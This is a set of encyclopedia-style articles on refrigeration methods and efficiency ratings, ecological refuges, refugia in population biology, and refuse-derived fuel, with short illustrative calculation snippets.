Other methods of refrigeration include the air cycle machine used in aircraft; the vortex tube used for spot cooling, when compressed air is available; and thermoacoustic refrigeration using sound waves in a pressurized gas to drive heat transfer and heat exchange; steam jet cooling popular in the early 1930s for air conditioning large buildings; thermoelastic cooling using a smart metal alloy stretching and relaxing. Many Stirling cycle heat engines can be run backwards to act as a refrigerator, and therefore these engines have a niche use in cryogenics . In addition, there are other types of cryocoolers such as Gifford-McMahon coolers, Joule-Thomson coolers, pulse-tube refrigerators and, for temperatures between 2 mK and 500 mK, dilution refrigerators .
Another potential solid-state refrigeration technique and a relatively new area of study comes from a special property of superelastic materials. These materials undergo a temperature change when a mechanical stress is applied (called the elastocaloric effect). Since superelastic materials deform reversibly at high strains, the material exhibits a flattened elastic region in its stress-strain curve, caused by a phase transformation from an austenitic to a martensitic crystal phase.
When a superelastic material is stressed in the austenitic phase, it undergoes an exothermic phase transformation to the martensitic phase, which causes the material to heat up. Removing the stress reverses the process, restores the material to its austenitic phase, and absorbs heat from the surroundings, cooling the material down.
The most appealing part of this research is how potentially energy efficient and environmentally friendly this cooling technology is. The materials used, commonly shape-memory alloys, provide a non-toxic source of emission-free refrigeration. The most commonly studied materials are shape-memory alloys such as nitinol and Cu-Zn-Al. Nitinol is one of the more promising alloys, with an output heat of about 66 J/cm3 and a temperature change of about 16–20 K. [ 83 ] Due to the difficulty in manufacturing some of the shape-memory alloys, alternative materials like natural rubber have been studied. Even though rubber may not give off as much heat per volume (12 J/cm3) as the shape-memory alloys, it still generates a comparable temperature change of about 12 K and operates over a suitable temperature range, at low stresses, and at low cost. [ 84 ]
The main challenge, however, comes from potential energy losses in the form of hysteresis, which is often associated with this process. Since most of these losses come from incompatibilities between the two phases, proper alloy tuning is necessary to reduce losses and increase reversibility and efficiency. Balancing the transformation strain of the material against the energy losses enables a large elastocaloric effect to occur and, potentially, a new alternative for refrigeration. [ 85 ]
The Fridge Gate method is a theoretical application of using a single logic gate to drive a refrigerator in the most energy-efficient way possible without violating the laws of thermodynamics. It operates on the fact that there are two energy states in which a particle can exist: the ground state and the excited state. The excited state carries a little more energy than the ground state, small enough so that the transition occurs with high probability. There are three components or particle types associated with the fridge gate. The first is in the interior of the refrigerator, the second is on the outside, and the third is connected to a power supply which heats it up every so often so that it can reach the e state and replenish the source. In the cooling step, on the inside of the refrigerator, the g-state particle absorbs energy from ambient particles, cooling them, and itself jumping to the e state. In the second step, on the outside of the refrigerator where the particles are also at an e state, the particle falls to the g state, releasing energy and heating the outside particles. In the third and final step, the power supply moves a particle at the e state, and when it falls to the g state it induces an energy-neutral swap where the interior e particle is replaced by a new g particle, restarting the cycle. [ 86 ]
When combining a passive daytime radiative cooling system with thermal insulation and evaporative cooling , one study found a 300% increase in ambient cooling power when compared to a stand-alone radiative cooling surface, which could extend the shelf life of food by 40% in humid climates and 200% in desert climates without refrigeration. The system's evaporative cooling layer would require water "re-charges" every 10 days to a month in humid areas and every 4 days in hot and dry areas. [ 87 ]
The refrigeration capacity of a refrigeration system is the product of the evaporators' enthalpy rise and the evaporators' mass flow rate. The measured capacity of refrigeration is often expressed in kW or BTU/h. Domestic and commercial refrigerators may be rated in kJ/s, or Btu/h of cooling. For commercial and industrial refrigeration systems, the kilowatt (kW) is the basic unit of refrigeration, except in North America, where both the ton of refrigeration and BTU/h are used.
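A minimal sketch of the capacity calculation, using assumed evaporator figures and standard unit conversions:

```python
# Refrigeration capacity = evaporator mass flow rate * enthalpy rise (illustrative values).
mass_flow = 0.25          # kg/s of refrigerant through the evaporator (assumed)
enthalpy_rise = 150.0     # kJ/kg gained by the refrigerant in the evaporator (assumed)

capacity_kw = mass_flow * enthalpy_rise          # kW (equivalently kJ/s)
capacity_btu_h = capacity_kw * 3412.14           # BTU/h
capacity_tons = capacity_kw / 3.517              # tons of refrigeration (1 TR is about 3.517 kW)
print(round(capacity_kw, 1), round(capacity_btu_h), round(capacity_tons, 1))
# 37.5 kW, ~128,000 BTU/h, ~10.7 tons with these assumed numbers
```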
A refrigeration system's coefficient of performance (CoP) is very important in determining a system's overall efficiency. It is defined as the refrigeration capacity in kW divided by the power input in kW. While CoP is a very simple measure of performance, it is typically not used for industrial refrigeration in North America. Owners and manufacturers of these systems typically use the performance factor (PF) instead. A system's PF is defined as the system's power input in horsepower divided by its refrigeration capacity in tons of refrigeration (TR). Both CoP and PF can be applied either to the entire system or to system components. For example, an individual compressor can be rated by comparing the energy needed to run the compressor with the expected refrigeration capacity based on inlet volume flow rate. It is important to note that both CoP and PF for a refrigeration system are only defined at specific operating conditions, including temperatures and thermal loads. Moving away from the specified operating conditions can dramatically change a system's performance.
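Continuing with hypothetical numbers, CoP and PF can be computed side by side; note that a higher CoP indicates better performance, while a lower PF (horsepower per ton) does:

```python
# Coefficient of performance and performance factor for the same hypothetical system.
capacity_kw = 37.5        # refrigeration capacity (assumed, as in the sketch above)
power_input_kw = 9.0      # electrical power input (assumed)

cop = capacity_kw / power_input_kw          # dimensionless, higher is better
capacity_tr = capacity_kw / 3.517           # tons of refrigeration
power_hp = power_input_kw / 0.7457          # horsepower
pf = power_hp / capacity_tr                 # hp per ton, lower is better
print(round(cop, 2), round(pf, 2))          # ~4.17 and ~1.13 hp/ton with these assumptions
```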
Air conditioning systems used in residential applications typically use SEER (Seasonal Energy Efficiency Ratio) for the energy performance rating. [ 88 ] Air conditioning systems for commercial applications often use EER ( Energy Efficiency Ratio ) and IEER (Integrated Energy Efficiency Ratio) for the energy efficiency performance rating. [ 89 ] | https://en.wikipedia.org/wiki/Refrigeration |
A refuge is a concept in ecology , in which an organism obtains protection from predation by hiding in an area where it is inaccessible or cannot easily be found. Due to population dynamics , when refuges are available, populations of both predators and prey are significantly higher, [ 1 ] [ 2 ] and significantly more species can be supported in an area. [ 3 ] [ 4 ]
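One textbook-style way to illustrate why refuges raise both populations is a Lotka-Volterra predator-prey model in which a fixed number of prey are inaccessible to predators; the parameter values below are arbitrary and the model is illustrative, not drawn from the cited studies:

```python
# Equilibrium of a Lotka-Volterra predator-prey model with a constant-number prey refuge.
# dN/dt = r*N - a*(N - R)*P ;  dP/dt = b*a*(N - R)*P - m*P   (only exposed prey, N - R, are attacked)
def equilibrium(R):
    r, a, b, m = 1.0, 0.1, 0.05, 0.5     # growth, attack, conversion, mortality (assumed values)
    exposed = m / (b * a)                # exposed prey needed to sustain the predator population
    prey = exposed + R                   # total prey = exposed prey + prey hidden in the refuge
    predators = r * prey / (a * exposed) # predator level at which prey growth is exactly offset
    return prey, predators

print(equilibrium(0))    # (100.0, 10.0) without a refuge
print(equilibrium(20))   # (120.0, 12.0): a refuge raises both equilibrium populations
```

In this toy model, every prey individual protected by the refuge adds to the total prey population, and the larger prey base in turn supports more predators, which is consistent with the pattern described above.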
Coral reefs provide the most dramatic demonstration of the ecological effects of refuges. [ 5 ] [ 6 ] Refuge-rich coral reefs contain a full 25% of ocean species, even though such reefs make up just 0.1% of the ocean's surface area. [ 7 ] [ 8 ] [ 9 ] [ 10 ] On the other hand, in the sunlight-illuminated open ocean just offshore, there are no places to hide from predation, and both the diversity and the quantity of organisms per unit area are much lower. [ 11 ] Additionally, coral reefs enhance non-local diversity by providing spawning grounds and a refuge habitat for juvenile fishes that will live in the open ocean as adults. [ 12 ]
Rainforest species diversity is also in large part the result of diverse and numerous physical refuges. [ 13 ]
Prey animals typically maintain larger populations when they have a place to physically hide from predation. For example, rats maintain a higher population density if the rats have refuges such as tall grass, allowing them to hide from predators such as owls and cats. [ 14 ] Sea birds often have nesting colonies on islands but not on nearby, apparently suitable, mainland sites. The islands lack the mammalian predators found on the mainland, such as cats, dogs, and rats, all of which typically decimate seabird colonies. [ 15 ] Semiaquatic animals, e.g. mouse-deer , may use bodies of water as refuges. [ 16 ]
Game reserves have been deliberately used to enhance the total population of large game , e.g. deer, for at least a century. [ 17 ] Limiting hunting by humans in a relatively small area allows the overall population to rebound. [ 18 ] The same principle applies to fisheries, which produce more fish when there is a nearby refuge from human predation in the form of a nature reserve , resulting in higher catches than if the whole area was open to fishing. [ 19 ] [ 20 ] [ 21 ] In human-managed systems like these, heavily hunted areas act as a sink in which animals die faster than they reproduce, but are replaced by animals migrating from the protected nature reserve area. [ 22 ]
Many prey animals systematically migrate between refuges and predator-rich feeding grounds, in patterns that minimize their chances of being caught by the predators.
The largest such migration by biomass is the oceans' diel vertical migration , in which vast quantities of organisms hide in the lightless depths of the open ocean, arising after dark to consume phytoplankton . [ 23 ] This allows them to avoid the large predatory fish of the open ocean, as these predators are primarily visual hunters and need light to effectively catch prey. Similar types of migration also occur in fresh water. For example, small European perch exhibit a daily horizontal migration in some lakes in Finland. During the day they move away from the vegetated areas where the predation threat in the clear water is great, into more turbid open water areas, moving back at night because of the greater availability of zooplankton among the aquatic plants. [ 24 ]
Refuge use reduces the likelihood of species extinction. [ 6 ] There have been a number of mass extinction events . During some of these, denizens of the deep ocean have been relatively immune. The coelacanth for example, is a remnant species of a once common group of fishes, the Sarcopterygii , which disappeared from shallow seas at the time of the Cretaceous–Paleogene extinction event 66 million years ago, leaving only a couple of surviving species. [ 25 ] [ 26 ] Many coral taxa have used the deep ocean as a refuge, shifting from shallow to deep water and vice versa during their evolutionary history. [ 27 ] By developing wings and taking flight, insects exploited the air as a refuge, a place of safety from ground-based predators; this successful evolutionary strategy set the insects on the path to occupying the dominant position they hold today. [ 28 ]
Human societies show a similar effect, with remote mountainous regions such as Zomia or the Scottish Highlands serving as refugia , allowing their inhabitants to maintain cultural traditions and languages that were being pushed to extinction in more accessible locations. [ 29 ] [ 30 ]
Refuge from predators often depends on the size of the prey, meaning that individuals under or over a specific size cannot be consumed by the predator.
The small individuals are more likely to be able to tuck themselves away in some hole or cranny, or if, like barnacles , they are living on an exposed surface, are of negligible interest to predators like starfish because of their small size. Another example is the tidepool sculpin , which takes refuge in small rockpools when the tide is out, thus taking advantage of its small size and avoiding its larger fish predators. [ 31 ]
Large individuals may escape predators by being too large to be consumed, or because their size allows them to inhabit areas free of predators. Often larger individuals can still be consumed by predators, but the predator will prefer small prey, as these require less work ( handling ) and the predator is less likely to get hurt by small individuals, leading to a larger return on investment. An example is the rock lobster, which can consume large individuals of the pink-lipped topshell, but will preferentially consume small individuals when given the choice. [ 32 ] Some barnacles escape predators by settling further up the shore, away from predators. There the starfish cannot reach them when the tide is out, nor can whelks drill through their shells, because they remain submerged for insufficient time during each tidal cycle. [ 33 ] In this situation, size is a refuge in itself, in that it enables the barnacle to escape desiccation under circumstances that might be lethal to smaller individuals. [ 33 ] | https://en.wikipedia.org/wiki/Refuge_(ecology) |
In biology, a refugium (plural: refugia ) is a location which supports an isolated or relict population of a once more widespread species. This isolation ( allopatry ) can be due to climatic changes, geography, or human activities such as deforestation and overhunting.
Present examples of refugial animal species are the mountain gorilla , isolated to specific mountains in central Africa, and the Australian sea lion , isolated to specific breeding beaches along the south-west coast of Australia, due to humans taking so many of their number as game. This resulting isolation, in many cases, can be seen as only a temporary state; however, some refugia may be longstanding, thereby having many endemic species , not found elsewhere, which survive as relict populations. The Indo-Pacific Warm Pool has been proposed to be a longstanding refugium, based on the discovery of the "living fossil" of a marine dinoflagellate called Dapsilidinium pastielsii , currently found only in the Indo-Pacific Warm Pool. [ 1 ]
For plants, anthropogenic climate change propels scientific interest in identifying refugial species that were isolated into small or disjunct ranges during glacial episodes of the Pleistocene , yet whose ability to expand their ranges during the warmth of interglacial periods (such as the Holocene ) was apparently limited or precluded by topographic , streamflow , or habitat barriers [ 2 ] [ 3 ] [ 4 ] —or by the extinction of coevolved animal dispersers . [ 5 ] The concern is that ongoing warming trends will expose them to extirpation or extinction in the decades ahead. [ 6 ] [ 7 ]
In anthropology , refugia often refers specifically to Last Glacial Maximum refugia , where some ancestral human populations may have been forced back to glacial refugia (similar small isolated pockets on the face of the continental ice sheets ) during the last glacial period . Going from west to east, suggested examples include the Franco-Cantabrian region (in northern Iberia ), the Italian and Balkan peninsulas, the Ukrainian LGM refuge , and the Bering Land Bridge . Archaeological and genetic data suggest that the source populations of Paleolithic humans survived the glacial maxima (including the Last Glacial Maximum ) in sparsely wooded areas and dispersed through areas of high primary productivity while avoiding dense forest cover . [ 8 ] Glacial refugia, where human populations found refuge during the last glacial period, may have played a crucial role in shaping the emergence and diversification of the language families that exist in the world today. [ 9 ]
More recently, refugia has been used to refer to areas that could offer relative climate stability in the face of modern climate change . [ 10 ]
As an example of a locale refugia study, Jürgen Haffer first proposed the concept of refugia to explain the biological diversity of bird populations in the Amazonian river basin . Haffer suggested that climatic change in the late Pleistocene led to reduced reservoirs of habitable forests in which populations become allopatric. Over time, that led to speciation : populations of the same species that found themselves in different refugia evolved differently, creating parapatric sister-species . As the Pleistocene ended, the arid conditions gave way to the present humid rainforest environment, reconnecting the refugia.
Scholars have since expanded the idea of this mode of speciation and used it to explain population patterns in other areas of the world, such as Africa , Eurasia , and North America . Theoretically, current biogeographical patterns can be used to infer past refugia: if several unrelated species follow concurrent range patterns, the area may have been a refugium. Moreover, the current distribution of species with narrow ecological requirements tend to be associated with the spatial position of glacial refugia. [ 11 ]
One can provide a simple explanation of refugia involving core temperatures and exposure to sunlight. In the northern hemisphere , north-facing sites on hills or mountains, and places at higher elevations count as cold sites . The reverse are sun- or heat-exposed, lower-elevation, south-facing sites: hot sites . (The opposite directions apply in the southern hemisphere .) Each site becomes a refugium, one as a "cold-surviving refugium" and the other as a "hot-surviving refugium". Canyons with deep hidden areas (the opposite of hillsides, mountains, mesas, etc. or other exposed areas) lead to these separate types of refugia.
A concept not often referenced is that of "sweepstakes colonization": [ 12 ] [ 13 ] a dramatic ecological event occurs, for example a meteor strike, and produces global, multiyear effects. The sweepstakes-winning species happen already to be living in a fortunate site, and their environment is rendered even more advantageous, as opposed to the "losing" species, which immediately fail to reproduce. [ 12 ] [ 13 ]
The creation of a refugium for bats and carnivores in Thailand was a necessary step in Betacoronavirus evolution and its jump from bats to civets, and then to humans, which ultimately caused the COVID-19 pandemic. [ 14 ]
Ecological understanding and geographic identification of climate refugia that remained significant strongholds for plant and animal survival during the extremes of past cooling and warming episodes largely pertain to the Quaternary glaciation cycles during the past several million years, especially in the Northern Hemisphere . A number of defining characteristics of past refugia are prevalent, including "an area where distinct genetic lineages have persisted through a series of Tertiary or Quaternary climate fluctuations owing to special, buffering environmental characteristics", "a geographical region that a species inhabits during the period of a glacial/interglacial cycle that represents the species' maximum contraction in geographical range," and "areas where local populations of a species can persist through periods of unfavorable regional climate." [ 15 ]
In systematic conservation planning , the term refugium has been used to define areas that could be used in protected area development to protect species from climate change . [ 10 ] The term has been used alternatively to refer to areas with stable habitats or stable climates. [ 10 ] More specifically, the term in situ refugium is used to refer to areas that will allow species that exist in an area to remain there even as conditions change, whereas ex situ refugium refers to an area into which species distributions can move to in response to climate change. [ 10 ] Sites that offer in situ refugia are also called resilient sites in which species will continue to have what they need to survive even as climate changes. [ 16 ]
One study found with downscaled climate models that areas near the coast are predicted to experience overall less warming than areas toward the interior of the US State of Washington . [ 17 ] Other research has found that old-growth forests are particularly insulated from climatic changes due to evaporative cooling effects from evapotranspiration and their ability to retain moisture. [ 18 ] The same study found that such effects in the Pacific Northwest would create important refugia for bird species. A review of refugia-focused conservation strategy in the Klamath-Siskiyou Ecoregion found that, in addition to old-growth forest, the northern aspects of hillslopes and deep gorges would provide relatively cool areas for wildlife and seeps or bogs surrounded by mature and old-growth forests would continue to supply moisture even as water availability decreases. [ 19 ]
Beginning in 2010 the concept of geodiversity (a term used previously in efforts to preserve scientifically important geological features) entered into the literature of conservation biologists as a potential way to identify climate change refugia and as a surrogate (in other words, a proxy used when planning for protected areas) for biodiversity. [ 20 ] [ 21 ] [ 22 ] While the language to describe this mode of conservation planning hadn't fully developed until recently, the use of geophysical diversity in conservation planning goes back at least as far as the work by Hunter and others in 1988, [ 23 ] and Richard Cowling and his colleagues in South Africa also used "spatial features" as surrogates for ecological processes in establishing conservation areas in the late 1990s and early 2000s. [ 24 ] [ 25 ] The most recent efforts have used the idea of land facets (also referred to as geophysical settings , enduring features , or geophysical stages [ 16 ] ), which are unique combinations of topographical features (such as slope steepness, slope direction, and elevation ) and soil composition, to quantify physical features. [ 21 ] The density of these facets, in turn, is used as a measure of geodiversity. [ 22 ] [ 16 ] Because geodiversity has been shown to be correlated with biodiversity, [ 2 ] even as species move in response to climate change, protected areas with high geodiversity may continue to protect biodiversity as niches get filled by the influx of species from neighboring areas. [ 16 ] Highly geodiverse protected areas may also allow for the movement of species within the area from one land facet or elevation to another. [ 16 ]
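As an illustration of how land facets might be enumerated in practice, the sketch below bins slope, aspect, and elevation from a synthetic elevation grid into coarse classes and counts the unique combinations; the grid, cell size, and class breaks are arbitrary assumptions, not any published scheme:

```python
import numpy as np

# Toy illustration of counting "land facets": bin slope, aspect, and elevation
# into coarse classes and count the distinct combinations present in an area.
rng = np.random.default_rng(0)
elevation = np.cumsum(rng.normal(0, 5, size=(50, 50)), axis=0) + 500  # synthetic terrain, metres

dzdy, dzdx = np.gradient(elevation, 30.0)              # 30 m cell size (assumed)
slope = np.degrees(np.arctan(np.hypot(dzdx, dzdy)))    # slope angle in degrees
aspect = (np.degrees(np.arctan2(dzdy, -dzdx)) + 360) % 360  # downslope direction, degrees

slope_class = np.digitize(slope, [5, 15, 30])          # flat / gentle / moderate / steep
aspect_class = np.digitize(aspect, [90, 180, 270])     # four coarse compass quadrants
elev_class = np.digitize(elevation, [400, 600, 800])   # coarse elevation bands

facets = slope_class * 100 + aspect_class * 10 + elev_class  # unique code per combination
print("distinct land facets in this area:", np.unique(facets).size)
```

The count of distinct facets (or their density per unit area) then serves as a crude proxy for geodiversity when comparing candidate protected areas.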
Conservation scientists, however, emphasize that the use of refugia to plan for climate change is not a substitute for fine-scale (more localized) and traditional approaches to conservation, as individual species and ecosystems will need to be protected where they exist in the present. [ 2 ] [ 26 ] They also emphasize that responding to climate change in conservation is not a substitute for actually limiting the causes of climate change. [ 2 ]
| https://en.wikipedia.org/wiki/Refugium_(population_biology) |
Refuse-derived fuel ( RDF ) is a fuel produced from various types of waste such as municipal solid waste (MSW), industrial waste or commercial waste.
The World Business Council for Sustainable Development provides a definition:
"Selected waste and by-products with recoverable calorific value can be used as fuels in a cement kiln , replacing a portion of conventional fossil fuels , like coal, if they meet strict specifications. Sometimes they can only be used after pre-processing to provide ‘tailor-made’ fuels for the cement process".
RDF consists largely of the combustible components of such waste, such as non-recyclable plastics (not including PVC ), paper, cardboard, labels, and other corrugated materials. These fractions are separated by different processing steps, such as screening, air classification, ballistic separation, separation of ferrous and non-ferrous materials, glass, stones and other foreign materials, and shredding to a uniform grain size or pelletizing, in order to produce a homogeneous material which can be used as a substitute for fossil fuels in, e.g., cement plants, lime plants and coal-fired power plants, or as a reducing agent in steel furnaces. If documented according to CEN/TC 343 it can be labeled as solid recovered fuel (SRF). [ 1 ]
Others describe the properties, such as:
There is no universally accepted classification or specification for such materials, and legislative authorities have not yet established exact guidelines on the type and composition of alternative fuels. The first approaches towards classification or specification are to be found in Germany (Bundesgütegemeinschaft für Sekundärbrennstoffe) as well as at the European level (European Recovered Fuel Organisation). These approaches, initiated primarily by the producers of alternative fuels, rest on a sound premise: only an exactly defined standardisation of the composition of such materials can make both production and utilisation uniform worldwide.
First approaches towards alternative fuel classification:
Solid recovered fuel (SRF) is a subset of RDF in that it is produced to meet a standard such as CEN/343 ANAS. [ 2 ] A comprehensive review of SRF / RDF production, quality standards and thermal recovery, including statistics on European SRF quality, is now available. [ 3 ]
In the 1950s, tyres were used for the first time as refuse-derived fuel in the cement industry. Continuous use of various waste-derived alternative fuels then followed in the mid-1980s with "Brennstoff aus Müll" (BRAM) – fuel from waste – in the Westphalian cement industry in Germany.
At that time, cost reduction through the replacement of fossil fuels was the priority, as considerable competitive pressure weighed on the industry. Since the 1980s the German Cement Works Association (Verein Deutscher Zementwerke e.V. (VDZ, Düsseldorf)) has documented the use of alternative fuels in the German cement industry. In 1987 refuse-derived fuels replaced less than 5% of fossil fuels; by 2015 the share had risen to almost 62%.
Refuse-derived fuels are used in a wide range of specialized waste-to-energy facilities, which use processed refuse-derived fuels with lower calorific values of 8–14 MJ/kg and grain sizes of up to 500 mm to produce electricity and thermal energy (heat/steam) for district heating systems or industrial uses.
Materials such as glass and metals are removed during treatment processing since they are non-combustible. The metal is removed using a magnet and the glass using mechanical screening . After that, an air knife is used to separate the light materials from the heavy ones. The light materials have a higher calorific value and form the final RDF. The heavy materials usually continue to a landfill . The residual material can be sold in its processed form (depending on the process treatment) as a plain mixture, or it may be compressed into pellet fuel , bricks or logs and used for other purposes, either stand-alone or in a recursive recycling process. [ 4 ] RDF or SRF is the combustible sub-fraction of municipal solid waste and other similar solid waste, produced using a mix of mechanical and/or biological treatment methods such as biodrying [ 5 ] in mechanical-biological treatment (MBT) plants. [ 3 ] During the production of RDF / SRF in MBT plants there are solid losses of otherwise combustible material, [ 6 ] which generates a debate over whether the production and use of RDF / SRF is resource-efficient compared with traditional one-step combustion of residual MSW in incineration ( Energy from waste ) plants. [ 7 ]
In the process of making RDF pellets from shredded SRF, drying is often required. Typically, the moisture content needs to be reduced to below 20% to produce high-calorific, high-density RDF pellets. Drying RDF often requires a substantial amount of energy, so choosing an inexpensive heat source is preferable.
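As a rough illustration of why drying dominates the energy cost of pelletizing, the minimal sketch below estimates the heat needed to bring one tonne of shredded SRF from 35% to 20% wet-basis moisture. The 35% starting moisture, the dryer efficiency and the latent-heat figure are illustrative assumptions, not values from the sources cited here.

```python
# Rough estimate of the heat needed to dry shredded SRF before pelletizing.
# All input values are illustrative assumptions, not measured data.

LATENT_HEAT_MJ_PER_KG = 2.26   # latent heat of vaporization of water, ~2.26 MJ/kg
DRYER_EFFICIENCY = 0.6         # assumed overall thermal efficiency of the dryer

def drying_heat_mj(mass_kg: float, moisture_in: float, moisture_out: float) -> float:
    """Heat (MJ) to reduce the wet-basis moisture of `mass_kg` of SRF."""
    dry_solids = mass_kg * (1.0 - moisture_in)            # kg of bone-dry material
    water_out = dry_solids * moisture_out / (1.0 - moisture_out)
    water_removed = mass_kg * moisture_in - water_out     # kg of water evaporated
    return water_removed * LATENT_HEAT_MJ_PER_KG / DRYER_EFFICIENCY

if __name__ == "__main__":
    heat = drying_heat_mj(1000.0, 0.35, 0.20)  # one tonne, 35% -> 20% moisture
    print(f"~{heat:.0f} MJ per tonne")         # roughly 700 MJ with these numbers
```

With these assumptions, roughly 190 kg of water must be evaporated per tonne of SRF, which is why an inexpensive heat source, such as waste heat, matters.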
The production of RDF may involve the following steps:
RDF can be used in a variety of ways to produce electricity or as a replacement for fossil fuels. It can be used alongside traditional sources of fuel in coal power plants. In Europe RDF can be used in the cement kiln industry, where the strict air pollution control standards of the Waste Incineration Directive apply. The main limiting factor for RDF / SRF use in cement kilns is its total chlorine (Cl) content, with the mean Cl content of average commercially manufactured SRF being 0.76% w/w on a dry basis (± 0.14% w/wd, 95% confidence). [ 8 ] RDF can also be fed into plasma arc gasification modules and pyrolysis plants. Where the RDF can be combusted cleanly or in compliance with the Kyoto Protocol , RDF can provide a funding source where unused carbon credits are sold on the open market via a carbon exchange. [ clarification needed ] However, the use of municipal waste contracts [ clarification needed ] and the bankability [ jargon ] of these solutions are still relatively new concepts, so RDF's financial advantage may be debatable. The European market for the production of RDF has grown quickly due to the European landfill directive and the imposition of landfill taxes. Refuse-derived fuel (RDF) exports from the UK to Europe and beyond are expected to have reached 3.3 million tonnes in 2015, representing a near-500,000 tonne increase on the previous year.
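Because total chlorine is the main limiting factor for kiln use, a plant operator typically checks the chlorine content of the blended fuel at a given substitution rate. The minimal sketch below illustrates that check as a simple mass-weighted blend; the coal chlorine content and the permit limit are illustrative assumptions, while the 0.76% SRF mean comes from the study cited above.

```python
# Check blended-fuel chlorine at a given RDF/SRF substitution rate.
# Mass-weighted blending is a simplification; the coal Cl content and the
# permit limit below are illustrative assumptions.

SRF_CL = 0.0076    # mean total Cl of commercial SRF, dry basis (0.76% w/w, per the study above)
COAL_CL = 0.001    # assumed Cl content of the coal being replaced (0.1% w/w)
CL_LIMIT = 0.005   # assumed plant-specific limit on blended-fuel Cl (0.5% w/w)

def blended_cl(srf_mass_fraction: float) -> float:
    """Mass-weighted Cl content of an SRF/coal fuel blend."""
    return srf_mass_fraction * SRF_CL + (1.0 - srf_mass_fraction) * COAL_CL

for share in (0.2, 0.4, 0.6):
    cl = blended_cl(share)
    verdict = "within" if cl <= CL_LIMIT else "exceeds"
    print(f"{share:.0%} SRF -> {cl * 100:.2f}% Cl ({verdict} the assumed limit)")
```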
The biomass fraction of RDF and SRF has a monetary value under multiple greenhouse gas protocols, such as the European Union Emissions Trading Scheme and the Renewable Obligation Certificate program in the United Kingdom. Biomass is considered to be carbon-neutral since the CO 2 liberated from the combustion of biomass is taken up again by growing plants. The combusted biomass fraction of RDF/SRF is used by stationary combustion operators to reduce their overall reported CO 2 emissions.
Several methods have been developed by the European CEN 343 working group to determine the biomass fraction of RDF/SRF. The initial two methods developed (CEN/TS 15440) were the manual sorting method and the selective dissolution method; a comparative assessment of these two methods is available. [ 9 ] An alternative, but more expensive method was developed using the principles of radiocarbon dating. A technical review (CEN/TR 15591:2007) outlining the carbon-14 method was published in 2007, and a technical standard of the carbon dating method (CEN/TS 15747:2008) was published in 2008. [ 10 ] In the United States, there is already an equivalent carbon-14 method under the standard method ASTM D6866.
Although carbon-14 dating can determine the biomass fraction of RDF/SRF, it cannot determine directly the biomass calorific value. Determining the calorific value is important for green certificate programs such as the Renewable Obligation Certificate program. These programs award certificates based on the energy produced from biomass. Several research papers, including the one commissioned by the Renewable Energy Association in the UK, have been published that demonstrate how the carbon-14 result can be used to calculate the biomass calorific value.
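To illustrate how a carbon-14 result feeds into such a calculation, the minimal sketch below converts a measured percent-modern-carbon (pMC) value into a biogenic carbon fraction and then into an approximate biomass share of the calorific value. The reference pMC and the heating values are illustrative assumptions, and treating the carbon fraction as a proxy for the mass fraction is a simplification; real programs follow the procedures in ASTM D6866 or CEN/TS 15747.

```python
# From a carbon-14 (pMC) measurement to an approximate biomass energy share.
# Reference pMC and heating values are illustrative assumptions; standards
# such as ASTM D6866 / CEN/TS 15747 define the actual procedures.

REF_PMC = 102.0     # assumed pMC of fully modern (100% biogenic) carbon
CV_BIOMASS = 15.0   # assumed net calorific value of the biomass fraction, MJ/kg
CV_FOSSIL = 35.0    # assumed net calorific value of the fossil (plastics) fraction, MJ/kg

def biogenic_carbon_fraction(sample_pmc: float) -> float:
    """Fraction of the fuel's carbon that is biogenic, from the measured pMC."""
    return min(sample_pmc / REF_PMC, 1.0)

def biomass_energy_share(mass_fraction_biomass: float) -> float:
    """Share of total calorific value contributed by the biomass fraction."""
    e_bio = mass_fraction_biomass * CV_BIOMASS
    e_fossil = (1.0 - mass_fraction_biomass) * CV_FOSSIL
    return e_bio / (e_bio + e_fossil)

# Example: a measured 61 pMC; carbon fraction used as a proxy for mass fraction.
f_bio = biogenic_carbon_fraction(61.0)   # ~0.60
print(f"biogenic fraction ~{f_bio:.2f}, energy share ~{biomass_energy_share(f_bio):.2f}")
```

Because the fossil fraction (largely plastics) has the higher heating value, the biomass share of the energy comes out noticeably lower than the biomass share of the carbon, which is why green certificate programs care about the calorific split.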
There are major challenges related to quality assurance, and especially to the accurate determination of the RDF / SRF thermal recovery (combustion) properties, due to their inherently variable (heterogeneous) composition. Recent advances enable optimal sub-sampling schemes [ 11 ] to go from an RDF / SRF sample of, say, 1 kg down to the grams or milligrams to be tested in analytical devices such as bomb calorimeters or TGA. With such solutions representative sub-sampling can be secured, though less so for the chlorine content. [ 12 ] New evidence suggests that the theory of sampling (ToS) may overestimate the processing effort needed to obtain a representative sub-sample.
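One widely used ToS tool for sizing such sub-sampling schemes is Gy's formula for the fundamental sampling error. The minimal sketch below applies it to the 1 kg-to-1 g step; all factor values are illustrative assumptions for a heterogeneous fuel, not values from the cited studies.

```python
# Gy's fundamental sampling error (a core tool of the theory of sampling, ToS).
# Relative variance: s^2 = f * g * c * l * d^3 * (1/Ms - 1/ML), masses in grams,
# top particle size d in cm. All factor values are illustrative assumptions.
import math

def fse_rel_std(d_cm: float, ms_g: float, ml_g: float,
                f: float = 0.5,    # particle shape factor (~0.5 for irregular grains)
                g: float = 0.25,   # granulometric (size-range) factor
                c: float = 1.5,    # constitution factor, g/cm^3 (assumed)
                l: float = 1.0     # liberation factor (worst case)
                ) -> float:
    """Relative standard deviation of the fundamental sampling error."""
    var = f * g * c * l * d_cm ** 3 * (1.0 / ms_g - 1.0 / ml_g)
    return math.sqrt(max(var, 0.0))

# Sub-sampling 1 g from a 1 kg lab sample milled to 1 mm (0.1 cm) top size:
print(f"relative std ~{fse_rel_std(0.1, 1.0, 1000.0):.1%}")   # ~1.4% here
```

The cubic dependence on particle size carries the practical message: milling the sample finer before splitting reduces the fundamental error far faster than taking a larger sub-sample does.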
In 2009, in response to the Naples waste management issue in Campania , Italy, the Acerra incineration facility was completed at a cost of over €350 million. The incinerator burns 600,000 tons of waste per year. [ 13 ] The energy produced from the facility is enough to power 200,000 households per year. [ 14 ]
The first full-scale waste-to-energy facility in the US was the Arnold O. Chantland Resource Recovery Plant, built in 1975 in Ames, Iowa. This plant also produces RDF that is sent to a local power plant as supplemental fuel. [ 15 ]
The city of Manchester , in the north west of England, is in the process of awarding a contract for the use of RDF to be produced by proposed mechanical biological treatment facilities as part of a large PFI contract. The Greater Manchester Waste Disposal Authority has recently announced significant market interest in initial bids for the use of the RDF, which is projected to be produced in tonnages of up to 900,000 tonnes per annum. [ 16 ] [ 17 ]
